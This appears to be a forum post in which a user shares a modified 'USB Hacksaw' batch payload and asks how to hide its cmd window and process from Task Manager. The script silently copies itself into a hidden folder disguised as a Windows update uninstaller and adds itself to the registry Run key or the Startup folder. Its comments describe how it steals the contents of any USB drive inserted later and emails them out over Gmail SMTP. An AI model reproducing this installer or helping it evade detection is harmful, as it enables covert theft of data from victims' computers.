I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!
The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?
if exist C:Void.txt GOTO end
::Use /\/\ to keep from infecting yourself
:: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc
:: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss
:: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently
:: install on windows 2000, XP, or 2003 machines with either administrator or guest access.
:: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or
:: startup folder depening on user rights, and start the program.
:: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will
:: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the
:: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper,
:: then silently run the send.bat file located in the same directory, which will then archive the contents
:: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the
:: downloaded data to an email address, and remove the documents and archives.
:: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method
:: for determining user rights and thus installing accordingly was planned, however problems with the
:: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more
:: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests
:: shouldnt be able to and check errorlevel).
:: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org
:: Programs used:
:: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml
:: Stunnel -- http://www.stunnel.org/
:: Blat -- http://www.blat.net/
:: Shortcut -- http://www.optimumx.com/download/#Shortcut
:: Rar -- http://www.rarlabs.com/
:: More information and future developments of this hack can be found at:
:: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs
mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"
:: go to payload directory
:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)
attrib *.* -s -h
:: copy payload to target
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"
:: reapply hidden and system attributes
attrib *.* +s +h
:: If admin register USB Hacksaw as startup program in registry, else do it the yucky way
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"
:: Hide USB Hacksaw
attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h
:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)
:: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe"
I have tried:
taskkill /f /cmd.exe
exit /b 1
How can I make it end itself? Make it not seen in Task Manager